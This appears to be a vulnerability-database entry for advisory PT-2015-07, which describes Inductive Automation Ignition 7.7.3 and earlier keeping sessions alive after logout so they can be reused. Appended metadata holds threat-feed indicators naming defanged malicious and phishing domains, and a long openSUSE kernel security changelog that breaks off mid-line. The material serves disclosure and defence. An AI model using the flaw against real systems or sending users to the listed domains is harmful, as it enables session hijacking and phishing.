ID PT-2015-07
Type ptsecurity
Reporter Positive Technologies
Modified 1970-01-01T00:00:00
Description
PT-2015-07: Privilege Gaining in Inductive Automation Ignition
Vulnerable software
Inductive Automation Ignition
Version: 7.7.3 and earlier
Link:
https://www.inductiveautomation.com/
Severity level
Severity level: Medium
Impact: Privilege Gaining
Access Vector: Remote
CVSS v2:
Base Score: 5.5
Vector: (AV:A/AC:H/Au:S/C:P/I:C/A:P)
CVE: not assigned
Software description
Inductive Automation Ignition is a cross-platform HMI, SCADA, and MES solution.
Vulnerability description
The specialists of the Positive Research center have detected a Privilege Gaining vulnerability in Inductive Automation Ignition.
After user’s logout session is not removed which could lead to session reuse by attacker with privileges of the same user.
How to fix
Update your sofware up to the latest version
Advisory status
12.02.2015 - Vendor gets vulnerability details
09.03.2015 - Vendor releases fixed version and details
11.03.2015 - Public disclosure
Credits
The vulnerability was detected by Evgeny Druzhinin, Positive Research Center (Positive Technologies Company)
References
http://en.securitylab.ru/lab/PT-2015-07
Reports on the vulnerabilities previously discovered by Positive Research:
<http://www.ptsecurity.com/research/advisory/>
<http://en.securitylab.ru/lab/>
{"id": "PT-2015-07", "lastseen": "2020-06-11T19:05:52", "viewCount": 33, "bulletinFamily": "info", "cvss": {}, "edition": 4, "ptsecurityAffected": [], "type": "ptsecurity", "description": "# PT-2015-07: Privilege Gaining in Inductive Automation Ignition\n\n## Vulnerable software\n\nInductive Automation Ignition \nVersion: 7.7.3 and earlier\n\nLink: \n[https://www.inductiveautomation.com/](<https://www.inductiveautomation.com/scada-software/>)\n\n## Severity level\n\nSeverity level: Medium \nImpact: Privilege Gaining \nAccess Vector: Remote \n\n\nCVSS v2: \nBase Score: 5.5 \nVector: (AV:A/AC:H/Au:S/C:P/I:C/A:P)\n\nCVE: not assigned\n\n## Software description\n\nInductive Automation Ignition is a cross-platform HMI, SCADA, and MES solution.\n\n## Vulnerability description\n\nThe specialists of the Positive Research center have detected a Privilege Gaining vulnerability in Inductive Automation Ignition.\n\nAfter user\u2019s logout session is not removed which could lead to session reuse by attacker with privileges of the same user.\n\n## How to fix\n\nUpdate your sofware up to the latest version\n\n## Advisory status\n\n12.02.2015 - Vendor gets vulnerability details \n09.03.2015 - Vendor releases fixed version and details \n11.03.2015 - Public disclosure\n\n## Credits\n\nThe vulnerability was detected by Evgeny Druzhinin, Positive Research Center (Positive Technologies Company)\n\n## References\n\n[ http://en.securitylab.ru/lab/PT-2015-07](<http://en.securitylab.ru/lab/PT-2015-07>) \n\n\nReports on the vulnerabilities previously discovered by Positive Research:\n\n<http://www.ptsecurity.com/research/advisory/> \n<http://en.securitylab.ru/lab/>\n", "title": "PT-2015-07: Privilege Gaining in Inductive Automation Ignition", "cvelist": [], "published": "2015-11-03T00:00:00", "references": ["http://en.securitylab.ru/lab/PT-2015-07"], "reporter": "Positive Technologies", "modified": "1970-01-01T00:00:00", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2015-07/", "enchantments": {"dependencies": {"references": [{"type": "mskb", "idList": ["KB4011200"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-140.NASL", "OPENSUSE-2016-273.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-25439", "1337DAY-ID-25204", "1337DAY-ID-31673"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138083", "PACKETSTORM:136859", "PACKETSTORM:150433", "PACKETSTORM:141523", "PACKETSTORM:137941"]}, {"type": "seebug", "idList": ["SSV:92748"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:154217C4E22F7E69A2A1ADE7137284FF", "EXPLOITPACK:ACB669AF665DBE40385085A8FAAD529D", "EXPLOITPACK:10FC054F61AB23DF9EBD8B76BA25CF3B"]}, {"type": "exploitdb", "idList": ["EDB-ID:39745", "EDB-ID:40125"]}, {"type": "thn", "idList": ["THN:DE5B6507B89A4E6D0FE70CB0B87426D4"]}, {"type": "ciscothreats", "idList": ["CISCO-THREAT-43959"]}, {"type": "openvas", "idList": ["OPENVAS:703457"]}], "modified": "2020-06-11T19:05:52", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-06-11T19:05:52", "rev": 2}, "vulnersScore": 4.0}, "scheme": null}
{"rst": [{"lastseen": "2021-01-25T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **beborneo[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-25T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 108[.]179.233.1\nWhois:\n Created: 2015-12-28 07:03:41, \n Registrar: PT ARDH GLOBAL INDONESIA, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:05548276-045A-3082-A6B5-B6DD8045C614", "href": "", "published": "2021-01-26T00:00:00", "title": "RST Threat feed. IOC: beborneo.com", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **bagir[.]pt/shp/sharepoint-md7** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-07-19T03:00:00, Last seen: 2020-09-06T03:00:00.\n IOC tags: **phishing**.\nIt was found that the IOC is used by: **cve-2018-19396, cve-2019-9023, cve-2015-8994, cve-2013-4635, cve-2011-0755, cve-2017-16642, cve-2012-0788, cve-2016-7478, cve-2019-6977, cve-2012-0789, cve-2010-3870, cve-2011-1470, cve-2011-0421, cve-2010-5107, cve-2011-1464, cve-2013-1635, cve-2017-15906, cve-2011-4327, cve-2012-1172, cve-2011-1092, cve-2014-1692, cve-2018-15132, cve-2012-1823, cve-2012-3365, cve-2018-10546, cve-2018-10547, cve-2019-9638, cve-2019-9639, cve-2011-4885, cve-2012-2376, cve-2014-2497, cve-2018-19935, cve-2011-0708, cve-2018-14883, cve-2010-4699, cve-2016-10708, cve-2018-10548, cve-2012-0057, cve-2018-10549, cve-2019-9637, cve-2013-4248, cve-2014-0238, cve-2011-5000, cve-2018-17082, cve-2011-1469, cve-2011-1468, cve-2012-0814, cve-2014-9427, cve-2012-2386, cve-2014-0237, cve-2018-10545, cve-2010-4755, cve-2011-1466, cve-2011-1467, cve-2012-2311, cve-2012-2336, cve-2012-1171, cve-2016-0777, cve-2019-9641, cve-2018-20783, cve-2018-19520, cve-2012-2688, cve-2013-2110, cve-2013-1643, cve-2012-2143, cve-2019-9024, cve-2014-5459, cve-2011-4718, cve-2018-19395, cve-2019-9020, cve-2019-9021, cve-2006-7243, cve-2010-4478**.\nIOC could be a **False Positive** (Resource unavailable).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-07-19T00:00:00", "id": "RST:2EE54CF9-879E-3D80-B1F7-3D6D0191C682", "href": "", "published": "2020-09-09T00:00:00", "title": "RST Threat feed. IOC: bagir.pt/shp/sharepoint-md7", "type": "rst", "cvss": {}}], "nessus": [{"lastseen": "2021-01-20T12:41:46", "description": "The openSUSE Leap 42.3 Linux kernel was updated to 4.4.172 to receive\nvarious security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2019-3459,CVE-2019-3460: Two remote information leak\n vulnerabilities in the Bluetooth stack were fixed that\n could potentially leak kernel information (bsc#1120758)\n\n - CVE-2018-19407: The vcpu_scan_ioapic function in\n arch/x86/kvm/x86.c allowed local users to cause a denial\n of service (NULL pointer dereference and BUG) via\n crafted system calls that reach a situation where ioapic\n is uninitialized (bnc#1116841).\n\n - CVE-2018-19985: The function hso_probe read if_num from\n the USB device (as an u8) and used it without a length\n check to index an array, resulting in an OOB memory read\n in hso_probe or hso _get_config_data that could be used\n by local attackers (bnc#1120743).\n\n - CVE-2018-1120: By mmap()ing a FUSE-backed file onto a\n process's memory containing command line arguments (or\n environment strings), an attacker can cause utilities\n from psutils or procps (such as ps, w) or any other\n program which made a read() call to the\n /proc/<pid>/cmdline (or /proc/<pid>/environ) files to\n block indefinitely (denial of service) or for some\n controlled time (as a synchronization primitive for\n other attacks) (bnc#1087082).\n\n - CVE-2018-16884: NFS41+ shares mounted in different\n network namespaces at the same time can make\n bc_svc_process() use wrong back-channel IDs and cause a\n use-after-free vulnerability. Thus a malicious container\n user can cause a host kernel memory corruption and a\n system panic. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out (bnc#1119946).\n\n - CVE-2018-20169: The USB subsystem mishandled size checks\n during the reading of an extra descriptor, related to\n __usb_get_extra_descriptor in drivers/usb/core/usb.c\n (bnc#1119714).\n\n - CVE-2018-9568: In sk_clone_lock of sock.c, there is a\n possible memory corruption due to type confusion. This\n could lead to local escalation of privilege with no\n additional execution privileges needed. User interaction\n is not needed for exploitation. (bnc#1118319).\n\n - CVE-2018-16862: A security flaw was found in a way that\n the cleancache subsystem clears an inode after the final\n file truncation (removal). The new file created with the\n same inode may contain leftover pages from cleancache\n and the old file data instead of the new one\n (bnc#1117186).\n\n - CVE-2018-19824: A local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c\n (bnc#1118152).\n\nThe following non-security bugs were fixed :\n\n - 9p/net: put a lower bound on msize (bnc#1012382).\n\n - ACPI/IORT: Fix iort_get_platform_device_domain()\n uninitialized pointer value (bsc#1121239).\n\n - acpi/nfit: Block function zero DSMs (bsc#1123321).\n\n - acpi/nfit: Fix command-supported detection\n (bsc#1123323).\n\n - acpi/nfit, x86/mce: Handle only uncorrectable machine\n checks (bsc#1114648).\n\n - acpi/nfit, x86/mce: Validate a MCE's address before\n using it (bsc#1114648).\n\n - acpi/power: Skip duplicate power resource references in\n _PRx (bnc#1012382).\n\n - acpi/processor: Fix the return value of\n acpi_processor_ids_walk() (git fixes (acpi)).\n\n - aio: fix spectre gadget in lookup_ioctx (bnc#1012382).\n\n - aio: hold an extra file reference over AIO read/write\n operations (bsc#1116027).\n\n - alsa: ac97: Fix incorrect bit shift at AC97-SPSA control\n write (bnc#1012382).\n\n - alsa: bebob: fix model-id of unit for Apogee Ensemble\n (bnc#1012382).\n\n - alsa: control: Fix race between adding and removing a\n user element (bnc#1012382).\n\n - alsa: cs46xx: Potential NULL dereference in probe\n (bnc#1012382).\n\n - alsa: emu10k1: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: emux: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: hda: add mute LED support for HP EliteBook 840 G4\n (bnc#1012382).\n\n - alsa: hda: Add support for AMD Stoney Ridge\n (bnc#1012382).\n\n - alsa: hda/realtek - Disable headset Mic VREF for headset\n mode of ALC225 (bnc#1012382).\n\n - alsa: hda/tegra: clear pending irq handlers\n (bnc#1012382).\n\n - alsa: isa/wavefront: prevent some out of bound writes\n (bnc#1012382).\n\n - alsa: pcm: Call snd_pcm_unlink() conditionally at\n closing (bnc#1012382).\n\n - alsa: pcm: Fix interval evaluation with openmin/max\n (bnc#1012382).\n\n - alsa: pcm: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: pcm: Fix starvation on down_write_nonblock()\n (bnc#1012382).\n\n - alsa: pcm: remove SNDRV_PCM_IOCTL1_INFO internal command\n (bnc#1012382).\n\n - alsa: rme9652: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: sparc: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - alsa: trident: Suppress gcc string warning\n (bnc#1012382).\n\n - alsa: usb-audio: Avoid access before bLength check in\n build_audio_procunit() (bnc#1012382).\n\n - alsa: usb-audio: Fix an out-of-bound read in\n create_composite_quirks (bnc#1012382).\n\n - alsa: wss: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - arc: change defconfig defaults to ARCv2 (bnc#1012382).\n\n - arc: [devboards] Add support of NFSv3 ACL (bnc#1012382).\n\n - arc: io.h: Implement reads(x)()/writes(x)()\n (bnc#1012382).\n\n - arm64: Do not trap host pointer auth use to EL2\n (bnc#1012382).\n\n - arm64/kvm: consistently handle host HCR_EL2 flags\n (bnc#1012382).\n\n - arm64: perf: set suppress_bind_attrs flag to true\n (bnc#1012382).\n\n - arm64: remove no-op -p linker flag (bnc#1012382).\n\n - arm: 8814/1: mm: improve/fix ARM v7_dma_inv_range()\n unaligned address handling (bnc#1012382).\n\n - arm: imx: update the cpu power up timing setting on\n i.mx6sx (bnc#1012382).\n\n - arm: kvm: fix building with gcc-8 (bsc#1121241).\n\n - arm: OMAP1: ams-delta: Fix possible use of uninitialized\n field (bnc#1012382).\n\n - arm: OMAP2+: prm44xx: Fix section annotation on\n omap44xx_prm_enable_io_wakeup (bnc#1012382).\n\n - ASoC: dapm: Recalculate audio map forcely when card\n instantiated (bnc#1012382).\n\n - ASoC: omap-dmic: Add pm_qos handling to avoid overruns\n with CPU_IDLE (bnc#1012382).\n\n - ASoC: omap-mcpdm: Add pm_qos handling to avoid\n under/overruns with CPU_IDLE (bnc#1012382).\n\n - ata: Fix racy link clearance (bsc#1107866).\n\n - ath10k: fix kernel panic due to race in accessing arvif\n list (bnc#1012382).\n\n - ax25: fix a use-after-free in ax25_fillin_cb()\n (bnc#1012382).\n\n - b43: Fix error in cordic routine (bnc#1012382).\n\n - batman-adv: Expand merged fragment buffer for full\n packet (bnc#1012382).\n\n - bfs: add sanity check at bfs_fill_super() (bnc#1012382).\n\n - block/loop: Use global lock for ioctl() operation\n (bnc#1012382).\n\n - block/swim3: Fix -EBUSY error when re-opening device\n after unmount (Git-fixes).\n\n - bnx2x: Assign unique DMAE channel number for FW DMAE\n transactions (bnc#1012382).\n\n - bonding: fix 802.3ad state sent to partner when\n unbinding slave (bnc#1012382).\n\n - bpf: fix check of allowed specifiers in bpf_trace_printk\n (bnc#1012382).\n\n - bpf: support 8-byte metafield access (bnc#1012382).\n\n - bpf, trace: check event type in bpf_perf_event_read\n (bsc#1119970).\n\n - bpf, trace: use READ_ONCE for retrieving file ptr\n (bsc#1119967).\n\n - bpf/verifier: Add spi variable to check_stack_write()\n (bnc#1012382).\n\n - bpf/verifier: Pass instruction index to\n check_mem_access() and check_xadd() (bnc#1012382).\n\n - btrfs: Always try all copies when reading extent buffers\n (bnc#1012382).\n\n - btrfs: ensure path name is null terminated at\n btrfs_control_ioctl (bnc#1012382).\n\n - btrfs: Fix memory barriers usage with device stats\n counters (git-fixes).\n\n - btrfs: fix use-after-free when dumping free space\n (bnc#1012382).\n\n - btrfs: Handle error from btrfs_uuid_tree_rem call in\n _btrfs_ioctl_set_received_subvol (git-fixes).\n\n - btrfs: release metadata before running delayed refs\n (bnc#1012382).\n\n - btrfs: send, fix infinite loop due to directory rename\n dependencies (bnc#1012382).\n\n - btrfs: tree-checker: Check level for leaves and nodes\n (bnc#1012382).\n\n - btrfs: tree-checker: Do not check max block group size\n as current max chunk size limit is unreliable (fixes for\n bnc#1012382 bsc#1102875 bsc#1102877 bsc#1102879\n bsc#1102882 bsc#1102896).\n\n - btrfs: tree-checker: Fix misleading group system\n information (bnc#1012382).\n\n - btrfs: tree-check: reduce stack consumption in\n check_dir_item (bnc#1012382).\n\n - btrfs: validate type when reading a chunk (bnc#1012382).\n\n - btrfs: wait on ordered extents on abort cleanup\n (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): Do not crash the kernel\n if can_priv::echo_skb is accessed out of bounds\n (bnc#1012382).\n\n - can: dev: can_get_echo_skb(): factor out non sending\n code to __can_get_echo_skb() (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): print error message, if\n trying to echo non existing skb (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): replace struct can_frame\n by canfd_frame to access frame length (bnc#1012382).\n\n - can: gw: ensure DLC boundaries after CAN frame\n modification (bnc#1012382).\n\n - can: rcar_can: Fix erroneous registration (bnc#1012382).\n\n - cdc-acm: fix abnormal DATA RX issue for Mediatek\n Preloader (bnc#1012382).\n\n - ceph: do not update importing cap's mseq when handing\n cap export (bsc#1121275).\n\n - checkstack.pl: fix for aarch64 (bnc#1012382).\n\n - cifs: Do not hide EINTR after sending network packets\n (bnc#1012382).\n\n - cifs: Fix error mapping for SMB2_LOCK command which\n caused OFD lock problem (bnc#1012382).\n\n - cifs: Fix potential OOB access of lock element array\n (bnc#1012382).\n\n - cifs: Fix separator when building path from dentry\n (bnc#1012382).\n\n - cifs: In Kconfig CONFIG_CIFS_POSIX needs depends on\n legacy (insecure cifs) (bnc#1012382).\n\n - clk: imx6q: reset exclusive gates on init (bnc#1012382).\n\n - clk: mmp: Off by one in mmp_clk_add() (bnc#1012382).\n\n - cpufeature: avoid warning when compiling with clang\n (Git-fixes).\n\n - cpufreq: imx6q: add return value check for voltage scale\n (bnc#1012382).\n\n - crypto: authencesn - Avoid twice completion call in\n decrypt path (bnc#1012382).\n\n - crypto: authenc - fix parsing key with misaligned\n rta_len (bnc#1012382).\n\n - crypto: cts - fix crash on short inputs (bnc#1012382).\n\n - crypto: user - support incremental algorithm dumps\n (bsc#1120902).\n\n - crypto: x86/chacha20 - avoid sleeping with preemption\n disabled (bnc#1012382).\n\n - cw1200: Do not leak memory if krealloc failes\n (bnc#1012382).\n\n - debugobjects: avoid recursive calls with kmemleak\n (bnc#1012382).\n\n - Disable MSI also when pcie-octeon.pcie_disable on\n (bnc#1012382).\n\n - disable stringop truncation warnings for now\n (bnc#1012382).\n\n - dlm: fixed memory leaks after failed ls_remove_names\n allocation (bnc#1012382).\n\n - dlm: lost put_lkb on error path in receive_convert() and\n receive_unlock() (bnc#1012382).\n\n - dlm: memory leaks on error path in dlm_user_request()\n (bnc#1012382).\n\n - dlm: possible memory leak on error path in create_lkb()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix memory leak in at_dma_xlate()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix module unloading (bnc#1012382).\n\n - dm cache metadata: ignore hints array being too small\n during resize (Git-fixes).\n\n - dm crypt: add cryptographic data integrity protection\n (authenticated encryption) (Git-fixes).\n\n - dm crypt: factor IV constructor out to separate function\n (Git-fixes).\n\n - dm crypt: fix crash by adding missing check for auth key\n size (git-fixes).\n\n - dm crypt: fix error return code in crypt_ctr()\n (git-fixes).\n\n - dm crypt: fix memory leak in crypt_ctr_cipher_old()\n (git-fixes).\n\n - dm crypt: introduce new format of cipher with 'capi:'\n prefix (Git-fixes).\n\n - dm crypt: wipe kernel key copy after IV initialization\n (Git-fixes).\n\n - dm: do not allow readahead to limit IO size (git fixes\n (readahead)).\n\n - dm kcopyd: Fix bug causing workqueue stalls\n (bnc#1012382).\n\n - dm-multipath: do not assign cmd_flags in setup_clone()\n (bsc#1103156).\n\n - dm snapshot: Fix excessive memory usage and workqueue\n stalls (bnc#1012382).\n\n - dm thin: stop no_space_timeout worker when switching to\n write-mode (Git-fixes).\n\n - drivers: hv: vmbus: check the creation_status in\n vmbus_establish_gpadl() (bsc#1104098).\n\n - drivers: hv: vmbus: Return -EINVAL for the sys files for\n unopened channels (bnc#1012382).\n\n - drivers/sbus/char: add of_node_put() (bnc#1012382).\n\n - drivers/tty: add missing of_node_put() (bnc#1012382).\n\n - drm/ast: change resolution may cause screen blurred\n (bnc#1012382).\n\n - drm/ast: fixed cursor may disappear sometimes\n (bnc#1012382).\n\n - drm/ast: fixed reading monitor EDID not stable issue\n (bnc#1012382).\n\n - drm/ast: Fix incorrect free on ioregs (bsc#1106929)\n\n - drm/fb-helper: Ignore the value of\n fb_var_screeninfo.pixclock (bsc#1106929)\n\n - drm/ioctl: Fix Spectre v1 vulnerabilities (bnc#1012382).\n\n - drm/msm: Grab a vblank reference when waiting for\n commit_done (bnc#1012382).\n\n - drm: rcar-du: Fix external clock error checks\n (bsc#1106929)\n\n - drm: rcar-du: Fix vblank initialization (bsc#1106929)\n\n - e1000e: allow non-monotonic SYSTIM readings\n (bnc#1012382).\n\n - EDAC: Raise the maximum number of memory controllers\n (bsc#1120722).\n\n - efi/libstub/arm64: Use hidden attribute for struct\n screen_info reference (bsc#1122650).\n\n - exec: avoid gcc-8 warning for get_task_comm\n (bnc#1012382).\n\n - exportfs: do not read dentry after free (bnc#1012382).\n\n - ext2: fix potential use after free (bnc#1012382).\n\n - ext4: fix a potential fiemap/page fault deadlock w/\n inline_data (bnc#1012382).\n\n - ext4: Fix crash during online resizing (bsc#1122779).\n\n - ext4: fix EXT4_IOC_GROUP_ADD ioctl (bnc#1012382).\n\n - ext4: fix possible use after free in ext4_quota_enable\n (bnc#1012382).\n\n - ext4: force inode writes when nfsd calls\n commit_metadata() (bnc#1012382).\n\n - ext4: missing unlock/put_page() in\n ext4_try_to_write_inline_data() (bnc#1012382).\n\n - f2fs: Add sanity_check_inode() function (bnc#1012382).\n\n - f2fs: avoid unneeded loop in build_sit_entries\n (bnc#1012382).\n\n - f2fs: check blkaddr more accuratly before issue a bio\n (bnc#1012382).\n\n - f2fs: clean up argument of recover_data (bnc#1012382).\n\n - f2fs: clean up with is_valid_blkaddr() (bnc#1012382).\n\n - f2fs: detect wrong layout (bnc#1012382).\n\n - f2fs: enhance sanity_check_raw_super() to avoid\n potential overflow (bnc#1012382).\n\n - f2fs: factor out fsync inode entry operations\n (bnc#1012382).\n\n - f2fs: fix inode cache leak (bnc#1012382).\n\n - f2fs: fix invalid memory access (bnc#1012382).\n\n - f2fs: fix missing up_read (bnc#1012382).\n\n - f2fs: fix to avoid reading out encrypted data in page\n cache (bnc#1012382).\n\n - f2fs: fix to convert inline directory correctly\n (bnc#1012382).\n\n - f2fs: fix to determine start_cp_addr by sbi->cur_cp_pack\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area v2 (bnc#1012382).\n\n - f2fs: fix to do sanity check with cp_pack_start_sum\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with node footer and\n iblocks (bnc#1012382).\n\n - f2fs: fix to do sanity check with reserved blkaddr of\n inline inode (bnc#1012382).\n\n - f2fs: fix to do sanity check with secs_per_zone\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with user_block_count\n (bnc#1012382).\n\n - f2fs: fix validation of the block count in\n sanity_check_raw_super (bnc#1012382).\n\n - f2fs: free meta pages if sanity check for ckpt is failed\n (bnc#1012382).\n\n - f2fs: give -EINVAL for norecovery and rw mount\n (bnc#1012382).\n\n - f2fs: introduce and spread verify_blkaddr (bnc#1012382).\n\n - f2fs: introduce get_checkpoint_version for cleanup\n (bnc#1012382).\n\n - f2fs: move sanity checking of cp into\n get_valid_checkpoint (bnc#1012382).\n\n - f2fs: not allow to write illegal blkaddr (bnc#1012382).\n\n - f2fs: put directory inodes before checkpoint in\n roll-forward recovery (bnc#1012382).\n\n - f2fs: remove an obsolete variable (bnc#1012382).\n\n - f2fs: return error during fill_super (bnc#1012382).\n\n - f2fs: sanity check on sit entry (bnc#1012382).\n\n - f2fs: use crc and cp version to determine roll-forward\n recovery (bnc#1012382).\n\n - fbdev: fbcon: Fix unregister crash when more than one\n framebuffer (bsc#1106929)\n\n - fbdev: fbmem: behave better with small rotated displays\n and many CPUs (bsc#1106929)\n\n - fix fragmentation series\n\n - Fix problem with sharetransport= and NFSv4\n (bsc#1114893).\n\n - floppy: fix race condition in __floppy_read_block_0()\n (Git-fixes).\n\n - fork: record start_time late (bnc#1012382).\n\n - fscache, cachefiles: remove redundant variable 'cache'\n (bnc#1012382).\n\n - fscache: Fix race in fscache_op_complete() due to split\n atomic_sub & read (Git-fixes).\n\n - fscache: Pass the correct cancelled indications to\n fscache_op_complete() (Git-fixes).\n\n - genwqe: Fix size check (bnc#1012382).\n\n - gfs2: Do not leave s_fs_info pointing to freed memory in\n init_sbd (bnc#1012382).\n\n - gfs2: Fix loop in gfs2_rbm_find (bnc#1012382).\n\n - git_sort.py: Remove non-existent remote tj/libata\n\n - gpiolib: Fix return value of gpio_to_desc() stub if\n !GPIOLIB (Git-fixes).\n\n - gpio: max7301: fix driver for use with CONFIG_VMAP_STACK\n (bnc#1012382).\n\n - gro_cell: add napi_disable in gro_cells_destroy\n (bnc#1012382).\n\n - hfs: do not free node before using (bnc#1012382).\n\n - hfsplus: do not free node before using (bnc#1012382).\n\n - hpwdt add dynamic debugging (bsc#1114417).\n\n - hpwdt calculate reload value on each use (bsc#1114417).\n\n - hugetlbfs: fix bug in pgoff overflow checking\n (bnc#1012382).\n\n - hwmon: (ina2xx) Fix current value calculation\n (bnc#1012382).\n\n - hwmon: (w83795) temp4_type has writable permission\n (bnc#1012382).\n\n - hwpoison, memory_hotplug: allow hwpoisoned pages to be\n offlined (bnc#1116336).\n\n - i2c: axxia: properly handle master timeout\n (bnc#1012382).\n\n - i2c: dev: prevent adapter retries and timeout being set\n as minus value (bnc#1012382).\n\n - i2c: scmi: Fix probe error on devices with an empty\n SMB0001 ACPI device node (bnc#1012382).\n\n - ib/hfi1: Fix an out-of-bounds access in get_hw_stats ().\n\n - ibmveth: Do not process frames after calling\n napi_reschedule (bcs#1123357).\n\n - ibmveth: fix DMA unmap error in ibmveth_xmit_start error\n path (bnc#1012382).\n\n - ibmvnic: Add ethtool private flag for driver-defined\n queue limits (bsc#1121726).\n\n - ibmvnic: Convert reset work item mutex to spin lock ().\n\n - ibmvnic: Fix non-atomic memory allocation in IRQ context\n ().\n\n - ibmvnic: Increase maximum queue size limit\n (bsc#1121726).\n\n - ibmvnic: Introduce driver limits for ring sizes\n (bsc#1121726).\n\n - ide: pmac: add of_node_put() (bnc#1012382).\n\n - ieee802154: lowpan_header_create check must check daddr\n (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for Lenovo IdeaPad\n 330-15ARR (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for touchpad in ASUS\n Aspire F5-573G (bnc#1012382).\n\n - input: elan_i2c - add ELAN0620 to the ACPI table\n (bnc#1012382).\n\n - input: elan_i2c - add support for ELAN0621 touchpad\n (bnc#1012382).\n\n - input: matrix_keypad - check for errors from\n of_get_named_gpio() (bnc#1012382).\n\n - input: omap-keypad - fix idle configuration to not block\n SoC idle states (bnc#1012382).\n\n - input: omap-keypad - fix keyboard debounce configuration\n (bnc#1012382).\n\n - input: restore EV_ABS ABS_RESERVED (bnc#1012382).\n\n - input: xpad - add GPD Win 2 Controller USB IDs\n (bnc#1012382).\n\n - input: xpad - add Mad Catz FightStick TE 2 VID/PID\n (bnc#1012382).\n\n - input: xpad - add more third-party controllers\n (bnc#1012382).\n\n - input: xpad - add PDP device id 0x02a4 (bnc#1012382).\n\n - input: xpad - add product ID for Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - add support for PDP Xbox One controllers\n (bnc#1012382).\n\n - input: xpad - add support for Xbox1 PDP Camo series\n gamepad (bnc#1012382).\n\n - input: xpad - add USB IDs for Mad Catz Brawlstick and\n Razer Sabertooth (bnc#1012382).\n\n - input: xpad - avoid using __set_bit() for capabilities\n (bnc#1012382).\n\n - input: xpad - constify usb_device_id (bnc#1012382).\n\n - input: xpad - correctly sort vendor id's (bnc#1012382).\n\n - input: xpad - correct xbox one pad device name\n (bnc#1012382).\n\n - input: xpad - do not depend on endpoint order\n (bnc#1012382).\n\n - input: xpad - fix GPD Win 2 controller name\n (bnc#1012382).\n\n - input: xpad - fix PowerA init quirk for some gamepad\n models (bnc#1012382).\n\n - input: xpad - fix rumble on Xbox One controllers with\n 2015 firmware (bnc#1012382).\n\n - input: xpad - fix some coding style issues\n (bnc#1012382).\n\n - input: xpad - fix stuck mode button on Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - fix Xbox One rumble stopping after 2.5\n secs (bnc#1012382).\n\n - input: xpad - handle 'present' and 'gone' correctly\n (bnc#1012382).\n\n - input: xpad - move reporting xbox one home button to\n common function (bnc#1012382).\n\n - input: xpad - power off wireless 360 controllers on\n suspend (bnc#1012382).\n\n - input: xpad - prevent spurious input from wired Xbox 360\n controllers (bnc#1012382).\n\n - input: xpad - quirk all PDP Xbox One gamepads\n (bnc#1012382).\n\n - input: xpad - remove spurious events of wireless xpad\n 360 controller (bnc#1012382).\n\n - input: xpad - remove unused function (bnc#1012382).\n\n - input: xpad - restore LED state after device resume\n (bnc#1012382).\n\n - input: xpad - simplify error condition in init_output\n (bnc#1012382).\n\n - input: xpad - sort supported devices by USB ID\n (bnc#1012382).\n\n - input: xpad - support some quirky Xbox One pads\n (bnc#1012382).\n\n - input: xpad - sync supported devices with 360Controller\n (bnc#1012382).\n\n - input: xpad - sync supported devices with XBCD\n (bnc#1012382).\n\n - input: xpad - sync supported devices with xboxdrv\n (bnc#1012382).\n\n - input: xpad - update Xbox One Force Feedback Support\n (bnc#1012382).\n\n - input: xpad - use LED API when identifying wireless\n controllers (bnc#1012382).\n\n - input: xpad - validate USB endpoint type during probe\n (bnc#1012382).\n\n - input: xpad - workaround dead irq_out after suspend/\n resume (bnc#1012382).\n\n - input: xpad - xbox one elite controller support\n (bnc#1012382).\n\n - intel_th: msu: Fix an off-by-one in attribute store\n (bnc#1012382).\n\n - iommu/amd: Call free_iova_fast with pfn in map_sg\n (bsc#1106105).\n\n - iommu/amd: Fix amd_iommu=force_isolation (bsc#1106105).\n\n - iommu/amd: Fix IOMMU page flush when detach device from\n a domain (bsc#1106105).\n\n - iommu/amd: Unmap all mapped pages in error path of\n map_sg (bsc#1106105).\n\n - iommu/vt-d: Fix memory leak in\n intel_iommu_put_resv_regions() (bsc#1106105).\n\n - iommu/vt-d: Handle domain agaw being less than iommu\n agaw (bsc#1106105).\n\n - ip6mr: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipmi:ssif: Fix handling of multi-part return messages\n (bnc#1012382).\n\n - ip: on queued skb use skb_header_pointer instead of\n pskb_may_pull 